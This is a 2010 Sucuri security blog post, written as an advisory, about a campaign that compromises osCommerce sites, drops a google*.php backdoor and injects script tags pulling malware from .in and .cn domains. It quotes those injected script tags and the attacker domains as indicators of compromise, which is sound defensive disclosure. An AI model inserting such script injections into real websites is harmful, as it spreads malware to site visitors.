• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

osCommerce attacks and nt07.in, nt06.in, etc

November 20, 2010David Dede

FacebookTwitterSubscribe

We posted yesterday about a series of attacks against osCommerce sites using some russian domains to push the malware (generally the fake AV). We also posted details on how to fix and secure osCommerce to protect against those:

https://blog.sucuri.net/2010/11/continuing-attacks-against-oscommerce-sites.html

However, they are not the only ones targeting osCommerce. There is another group using many .in web sites (always registered by Jennifer Hook – veriandjsad@comcast.net) that are infecting thousands of sites too.

When they detect an vulnerable site (see previous post by details on that), they drop a backdoor, generally named google*.php that will allow them to manage the site remotely. You can see the full backdoor here (caught by our honeypots):

http://sucuri.net/?page=tools&title=blacklist&detail=1205dd32a1004a65ecc4d4441474217d

It is interesting that in addition to give full shell access to the attackers, it also uses http://redserver.com.ua/code.txt to read the list of domains to use in the attack. Currently, these are the ones being used:

<script src="http://nt07.in/3`></script>
<script src="http://nt07.in/3`></script>
<script src="http://nt06.in/3`></script>
<script src="http://nt06.in/3`></script>
<script src="http://nt04.in/3`></script>
<script src="http://nt04.in/3`></script>
<script src="http://nt02.co.in/3`></script>
<script src="http://nt02.co.in/3`></script>
<script src="http://nt002.cn/E/J.JS`></script>
<script src="http://nt002.cn/E/J.JS`></script>

You can get more details about this attack here: http://sucuri.net/malware/entry/MW:OSCOM:1. and if you are using osCommerce, make sure to upgrade and secure it as soon as possible.

How many sites got hacked? According to Google, just nt04.in (91.213.8.192) infected almost 3 thousand sites:

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 2890 domain(s), including folhadenoticias.com.br/, leskeupines.com/, todafruta.com.br/.

So the number is probably a lot bigger if we get all the domains used in the attacks and count the sites that didn’t get blacklisted yet.


Site hacked? Blacklisted? Sign up with us and we will get it fixed right away: http://sucuri.net

FacebookTwitterSubscribe

Categories: Website Malware InfectionsTags: Hacked Websites, Website Blacklist

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

The Anatomy of Website Malware Webinar

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2022 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.